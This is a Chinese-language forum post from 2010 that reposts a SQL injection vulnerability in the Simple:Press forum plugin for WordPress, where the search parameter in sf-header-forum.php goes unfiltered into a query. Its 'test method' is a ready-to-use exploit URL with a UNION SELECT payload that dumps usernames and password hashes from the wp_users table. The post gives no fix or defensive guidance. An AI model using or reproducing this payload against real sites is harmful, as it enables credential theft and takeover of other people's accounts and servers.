欢 迎 来 到 空 白 、
Would you like to react to this message? Create an account in a few clicks or log in to continue.
首页
搜索
搜索
结果按:
帖子
主题
高级搜索
Latest images
登录
注册
::
( 电脑 基地 )
WordPress免费论坛Blog系统SqL注入漏洞
作者
留言
Admin
εїз 幼稚园大班◘ ◙
帖子数
:
240
空白积分
:
226
空白荣誉
:
0
注册日期
:
10-07-21
主题: WordPress免费论坛Blog系统SqL注入漏洞
周日 八月 01, 2010 5:12 am
WordPress是一款免费的论坛Blog系统。
WordPress所使用的Simple:Press插件没有正确地过滤用户在搜索字段所输入的搜索变量便注入到了SQL查询中使用:
sf-header-forum.php
代码:略
测试方法:
http://127.0.1/wordpress/?page_id=4/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2
Like
Dislike
Admin
εїз 幼稚园大班◘ ◙
帖子数
:
240
空白积分
:
226
空白荣誉
:
0
注册日期
:
10-07-21
主题: 回复: WordPress免费论坛Blog系统SqL注入漏洞
周日 八月 01, 2010 5:13 am
Like
Dislike
WordPress免费论坛Blog系统SqL注入漏洞
第
1
页/共
1
页
您在这个论坛的权限:
您
不能
在这个论坛回复主题
::
( 电脑 基地 )
::
( 电脑 基地 )
转跳到:
选择一个论坛
|
|--( 电脑 基地 )
|--( QQ 专区 )
|--( 休闲 娱乐 )
|--( 软件 专区 )
首页 搜索 Latest images 登录 注册 
